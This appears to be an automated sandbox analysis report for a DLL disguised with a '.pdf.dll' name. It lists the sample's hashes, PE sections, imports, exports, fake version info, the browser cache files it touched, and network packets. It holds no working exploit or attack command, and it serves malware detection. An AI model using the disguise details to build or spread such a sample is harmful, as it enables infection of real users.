SSDEEP:	6:6v/lhPkR/C+4IopEC7sgasu46ZOEJOFcDk9W7FnRM/Vd6k7juw+7dp:6v/78/E7su7cJOckYhRMVpHcz
MD5:	90B4BB8F361DBC7E47302A89D88784CD
SHA1:	5358F75EE3DF0F741A97AC4F98C15E1545420DDD
SHA-256:	BFE14013476602A6F988D1ACAD265CCA5343E2062FB948B01354BA76C1C526B8
SHA-512:	2E51903F08B535A8E10395EC2C50C6C3D20E651D377D91EDE28E4566C1B5090991F34A3A652C50A3780501E95A7730DD6361E18F5A0FE0849D3A1AFCEED54028
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7gRE.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....IDAT8O.R...0.d.G...6.8.#8.#8..8.#8..~..n....>(X.......w.x%[.o....Ug......)........TjcE.....)..<.F_s!s.@....d.\|.&....`.@....gE.R!e`......).,...1.......8A.. ..fH.b.<....M.;g.!...P".$......>...A.D.@..k.&.O..y.?..u..e..`^..D..<a.W..`Bf.*S.>.o5d..k....<.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\a5ea21[1].ico Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	758
Entropy (8bit):	7.432323547387593
Encrypted:	false
SSDEEP:	12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
MD5:	84CC977D0EB148166481B01D8418E375
SHA1:	00E2461BCD67D7BA511DB230415000AEFBD30D2D
SHA-256:	BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
SHA-512:	F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Preview:	.PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D..M..............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q\|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq\|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\de-ch[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	79096
Entropy (8bit):	5.33782687971214
Encrypted:	false
SSDEEP:	768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCxP5HVN/QZYUmftKCB:olLEJxa4CmdiuWlcxHga7B
MD5:	15BCB7BBE03E5ABCE3162F71DADD8D63
SHA1:	2EF0AB2CC332049F5C79A7E088BD877759E93993
SHA-256:	5004E4E24FE7DCD410FE6274C514A5E49984353512A1FB0F962812065C6A381B
SHA-512:	FBAE0225579AEAF527F22914C6AC758D2D70A7870F167142D5B004A018CC454FFFDB9B2001181429FEE24012553177D929DC3FDA0CB7BB870F649DCF75561333
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/6f0cca92-2dda-4588-a757-0e009f333603/de-ch.json
Preview:	{"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\iab2Data[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	242382
Entropy (8bit):	5.1486574437549235
Encrypted:	false
SSDEEP:	768:l3JqIW6A3pZcOkv+prD5bxLkjO68KQHamIT4Ff5+wbUk6syZ7TMwz:l3JqINA3kR4D5bxLk78KsIkfZ6hBz
MD5:	D76FFE379391B1C7EE0773A842843B7E
SHA1:	772ED93B31A368AE8548D22E72DDE24BB6E3855C
SHA-256:	D0EB78606C49FCD41E2032EC6CC6A985041587AAEE3AE15B6D3B693A924F08F2
SHA-512:	23E7888E069D05812710BF56CC76805A4E836B88F7493EC6F669F72A55D5D85AD86AD608650E708FA1861BC78A139616322D34962FD6BE0D64E0BEA0107BF4F4
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/iab2Data.json
Preview:	{"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\jquery-2.1.1.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	84249
Entropy (8bit):	5.369991369254365
Encrypted:	false
SSDEEP:	1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
MD5:	9A094379D98C6458D480AD5A51C4AA27
SHA1:	3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
SHA-256:	B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
SHA-512:	4BBB1CCB1C9712ACE14220D79A16CAD01B56A4175A0DD837A90CA4D6EC262EBF0FC20E6FA1E19DB593F3D593DDD90CFDFFE492EF17A356A1756F27F90376B650
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquery-2.1.1.min.js
Preview:	/! jQuery v2.1.1 \| (c) 2005, 2014 jQuery Foundation, Inc. \| jquery.org/license /..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,funct

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\otBannerSdk[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	374818
Entropy (8bit):	5.338137698375348
Encrypted:	false
SSDEEP:	3072:axBt4stoUf3MiPnDxOFvxYyTcwY+OiHeNUQW2SzDZTpl1L:NUfbPnDxOFvxYyY+Oi+yQW2CDZTn1L
MD5:	2E5F92E8C8983AA13AA99F443965BB7D
SHA1:	D80209C734F458ABA811737C49E0A1EAF75F9BCA
SHA-256:	11D9CC951D602A168BD260809B0FA200D645409B6250BD8E8996882EBE3F5A9D
SHA-512:	A699BEC040B1089286F9F258343E012EC2466877CC3C9D3DFEF9D00591C88F976B44D9795E243C7804B62FDC431267E1117C2D42D4B73B7E879AEFB1256C644B
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otBannerSdk.js
Preview:	/** .. * onetrust-banner-sdk.. * v6.13.0.. * by OneTrust LLC.. * Copyright 2021 .. */..!function(){"use strict";var o=function(e,t){return(o=Object.setPrototypeOf\|\|{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}\|\|function(e,t){for(var o in t)t.hasOwnProperty(o)&&(e[o]=t[o])})(e,t)};var r=function(){return(r=Object.assign\|\|function(e){for(var t,o=1,n=arguments.length;o<n;o++)for(var r in t=arguments[o])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e}).apply(this,arguments)};function a(s,i,l,a){return new(l=l\|\|Promise)(function(e,t){function o(e){try{r(a.next(e))}catch(e){t(e)}}function n(e){try{r(a.throw(e))}catch(e){t(e)}}function r(t){t.done?e(t.value):new l(function(e){e(t.value)}).then(o,n)}r((a=a.apply(s,i\|\|[])).next())})}function d(o,n){var r,s,i,e,l={label:0,sent:function(){if(1&i[0])throw i[1];return i[1]},trys:[],ops:[]};return e={next:t(0),throw:t(1),return:t(2)},"function"==typeof Symbol&&(e[Symbol.iterator]=function(){return this}),e;function t(t

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\otTCF-ie[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	102879
Entropy (8bit):	5.311489377663803
Encrypted:	false
SSDEEP:	768:ONkWT0m7r8N1qpPVsjvB6z4Yj3RCjnugKtLEdT8xJORONTMC5GkkJ0XcJGk58:8kunecpuj5QRCjnrKxJg0TMC5ZW8
MD5:	52F29FAC6C1D2B0BAC8FE5D0AA2F7A15
SHA1:	D66C777DA4B6D1FEE86180B2B45A3954AE7E0AED
SHA-256:	E497A9E7A9620236A9A67F77D2CDA1CC9615F508A392ECCA53F63D2C8283DC0E
SHA-512:	DF33C49B063AEFD719B47F9335A4A7CE38FA391B2ADF5ACFD0C3FE891A5D0ADDF1C3295E6FF44EE08E729F96E0D526FFD773DC272E57C3B247696B79EE1168BA
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otTCF-ie.js
Preview:	!function(){"use strict";var c="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function e(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}function t(e,t){return e(t={exports:{}},t.exports),t.exports}function n(e){return e&&e.Math==Math&&e}function p(e){try{return!!e()}catch(e){return!0}}function E(e,t){return{enumerable:!(1&e),configurable:!(2&e),writable:!(4&e),value:t}}function o(e){return w.call(e).slice(8,-1)}function u(e){if(null==e)throw TypeError("Can't call method on "+e);return e}function l(e){return I(u(e))}function f(e){return"object"==typeof e?null!==e:"function"==typeof e}function i(e,t){if(!f(e))return e;var n,r;if(t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;if("function"==typeof(n=e.valueOf)&&!f(r=n.call(e)))return r;if(!t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;throw TypeError("Can't convert object to primitive value")}function y(e,t){retur

C:\Users\user\AppData\Local\Temp\~DF75532A51FCF86B61.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	374490
Entropy (8bit):	3.214921702309085
Encrypted:	false
SSDEEP:	3072:mZ/2BfcYmu5kLTzGtDZ/2Bfc/mu5kLTzGthZ/2BfcYmu5kLTzGtEZ/2Bfc/mu5kM:fS5l
MD5:	DB50B486F16DC6AE891AC9719320CBCF
SHA1:	1D083F5ABFEACF50BF8F5FC686E05F1B8C904D55
SHA-256:	9DB1BFC5A6780CC15892919F30C04C511F81CDD711F5BE6174989FC06CEE2531
SHA-512:	58CF7FB15656A2CD7D50CBBEC0EB54B3E7EB292D417556D7DA5146167C9666CBD151ADDE113127CB18D99EA1C56804EFA3A7C1C104FACBB7ADF1D9A82AE6E0A7
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF9F36DE493844459A.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12965
Entropy (8bit):	0.42025822957080783
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9louF9loS9lWknskZvb:kBqoINLknRZvb
MD5:	930871A5A15390C3B34A31255CD69D16
SHA1:	8C91711648A29D17E02F70738B8BF85BAD7EAEFD
SHA-256:	C112E28ED132CF46341EE2063CDE1502CAD2E7E5372B8C08C72D8CE4343D55F0
SHA-512:	1D28F4E66113937355C71B5293B57F28B8F3F7A3FB19570E406EC5042E360831402D5EEF1DF456FAF3842F45F6033C58394BE54C023778F54A45D25ED0C15DB8
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.630565254721084
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.40% Win16/32 Executable Delphi generic (2074/23) 0.21% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	606d810b8ff92.pdf.dll
File size:	812544
MD5:	0deffc9d51035390ddb6e2934ed67186
SHA1:	b449c2ffdd33a3c79e17c781b11be3daf4ae46c4
SHA256:	6c99703002ea5284f603d0041f3a72b3a9e26f8f7af45a1f5e34e4297be0efb8
SHA512:	8ff45a9e57547d62377a4f06a0d2b148425dd1f615d3a6fc9ffac581b0e25f8cfe7bbc0f897e74face6794a1b6454e04b645909fc0f1484baee6f7e84cdadc78
SSDEEP:	12288:Y/nZIRTkvZYLNqTuFRdpqcYD/U1KY+LVQng8FQ9X1GSLpSpptpIQ58e9CZu7vZ1S:NgvZY5NDpqcYD/UoVhz7pS7bIQtgAMx
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&.e`...........!................e................................................~....@.........................@u.....

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1049d65
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x1000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6065D026 [Thu Apr 1 13:52:38 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	565c04cd0d6065b95e9480146b8d28b0

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FB33CE15757h
call 00007FB33CE16257h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FB33CE155FAh
add esp, 0Ch
pop ebp
retn 000Ch
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007FB33CE14D98h
jmp 00007FB33CE15730h
mov ecx, dword ptr [ebp-14h]
xor ecx, ebp
call 00007FB33CE14D87h
jmp 00007FB33CE1571Fh
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [010B801Ch]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [010B801Ch]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
inc dword ptr fs:[eax]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xb7540	0xb8	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb75f8	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd9000	0x540	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xda000	0x5fc4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xaef38	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xaf088	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xaef90	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8e000	0x1b4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8c6fe	0x8c800	False	0.550423292927	data	6.74409418019	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8e000	0x29fae	0x2a000	False	0.528756277902	PCX ver. 2.5 image data bounding box [0, 0] - [30734, 11], 120 planes each of 128-bit 30748 x 11 dpi, uncompressed	5.30478908838	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb8000	0x20d3c	0x9400	False	0.569679054054	DOS executable (block device driver\377\377\377\377)	5.10494443738	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xd9000	0x540	0x600	False	0.414713541667	data	3.79012516028	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xda000	0x5fc4	0x6000	False	0.729736328125	data	6.67242289019	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xd90a0	0x31c	data	English	United States
RT_MANIFEST	0xd93c0	0x17d	XML 1.0 document text	English	United States

Imports

DLL

Import

KERNEL32.dll

VirtualFree, VirtualAlloc, PeekNamedPipe, GetEnvironmentVariableA, CreateMutexA, ReleaseMutex, DuplicateHandle, Sleep, VirtualProtect, GetCurrentThread, DeleteFileA, ResetEvent, GetWindowsDirectoryA, VirtualProtectEx, FindFirstChangeNotificationA, CreateDirectoryA, CreateSemaphoreA, WriteConsoleW, OpenMutexA, GetShortPathNameA, MultiByteToWideChar, FormatMessageA, GetStringTypeW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, LocalFree, GetCPInfo, CompareStringW, LCMapStringW, GetLocaleInfoW, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, CloseHandle, SetEvent, WaitForSingleObjectEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapReAlloc, HeapFree, GetStdHandle, GetFileType, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, SetConsoleCtrlHandler, GetTimeZoneInformation, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetProcessHeap, SetStdHandle, HeapSize, CreateFileW, OutputDebugStringW

Cabinet.dll

Exports

Name	Ordinal	Address
Charthea1	1	0x101d198
Claimdecide	2	0x101e461
DeathBroad	3	0x101db08
DllRegisterServer	4	0x101d4eb
Meetfinish	5	0x101dc30
Mouththese	6	0x101e0c5

Version Infos

Description	Data
LegalCopyright	Copyright 1997-2018 Wide Modern, Inc
InternalName	Metal happen
FileVersion	3.4.0.227
CompanyName	Wide Modern
Feel repeat	RowBought
ProductName	Wide Modern
ProductVersion	3.4.0.227
FileDescription	Metal happen
OriginalFilename	metal.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 7, 2021 11:56:10.080557108 CEST	49730	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:56:10.080950022 CEST	49731	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:56:10.094928026 CEST	443	49730	104.20.185.68	192.168.2.3
Apr 7, 2021 11:56:10.097274065 CEST	49730	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:56:10.097323895 CEST	49730	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:56:10.100177050 CEST	443	49731	104.20.185.68	192.168.2.3
Apr 7, 2021 11:56:10.100251913 CEST	49731	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:56:10.100888968 CEST	49731	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:56:10.111749887 CEST	443	49730	104.20.185.68	192.168.2.3
Apr 7, 2021 11:56:10.112679958 CEST	443	49730	104.20.185.68	192.168.2.3
Apr 7, 2021 11:56:10.112715006 CEST	443	49730	104.20.185.68	192.168.2.3
Apr 7, 2021 11:56:10.112772942 CEST	49730	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:56:10.112812042 CEST	49730	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:56:10.118988991 CEST	443	49731	104.20.185.68	192.168.2.3
Apr 7, 2021 11:56:10.120193958 CEST	443	49731	104.20.185.68	192.168.2.3
Apr 7, 2021 11:56:10.120224953 CEST	443	49731	104.20.185.68	192.168.2.3
Apr 7, 2021 11:56:10.120282888 CEST	49731	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:56:10.120315075 CEST	49731	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:56:10.128598928 CEST	49731	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:56:10.132869959 CEST	49731	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:56:10.133085966 CEST	49731	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:56:10.146415949 CEST	443	49731	104.20.185.68	192.168.2.3
Apr 7, 2021 11:56:10.146701097 CEST	443	49731	104.20.185.68	192.168.2.3
Apr 7, 2021 11:56:10.146723986 CEST	443	49731	104.20.185.68	192.168.2.3
Apr 7, 2021 11:56:10.146764994 CEST	49731	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:56:10.146784067 CEST	49731	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:56:10.147541046 CEST	49731	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:56:10.151072979 CEST	443	49731	104.20.185.68	192.168.2.3
Apr 7, 2021 11:56:10.151113987 CEST	443	49731	104.20.185.68	192.168.2.3
Apr 7, 2021 11:56:10.151160955 CEST	49731	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:56:10.151470900 CEST	443	49731	104.20.185.68	192.168.2.3
Apr 7, 2021 11:56:10.165263891 CEST	443	49731	104.20.185.68	192.168.2.3
Apr 7, 2021 11:56:10.166752100 CEST	443	49731	104.20.185.68	192.168.2.3
Apr 7, 2021 11:56:10.166774988 CEST	443	49731	104.20.185.68	192.168.2.3
Apr 7, 2021 11:56:10.166800976 CEST	49731	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:56:10.166821957 CEST	49731	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:56:10.197765112 CEST	49730	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:56:10.208806038 CEST	49730	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:56:10.210244894 CEST	443	49730	104.20.185.68	192.168.2.3
Apr 7, 2021 11:56:10.210839987 CEST	443	49730	104.20.185.68	192.168.2.3
Apr 7, 2021 11:56:10.210865021 CEST	443	49730	104.20.185.68	192.168.2.3
Apr 7, 2021 11:56:10.210974932 CEST	49730	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:56:10.211019039 CEST	49730	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:56:10.211517096 CEST	49730	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:56:10.221086979 CEST	443	49730	104.20.185.68	192.168.2.3
Apr 7, 2021 11:56:10.224047899 CEST	443	49730	104.20.185.68	192.168.2.3
Apr 7, 2021 11:56:10.226807117 CEST	443	49730	104.20.185.68	192.168.2.3
Apr 7, 2021 11:56:10.226946115 CEST	49730	443	192.168.2.3	104.20.185.68
Apr 7, 2021 11:56:13.816294909 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:13.816534042 CEST	49733	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:13.829535007 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:13.829572916 CEST	443	49733	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:13.829633951 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:13.829684019 CEST	49733	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:13.830693960 CEST	49732	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:13.830907106 CEST	49733	443	192.168.2.3	2.22.155.145
Apr 7, 2021 11:56:13.842358112 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:13.842425108 CEST	443	49733	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:13.843904972 CEST	443	49732	2.22.155.145	192.168.2.3
Apr 7, 2021 11:56:13.844016075 CEST	49732	443	192.168.2.3	2.22.155.145
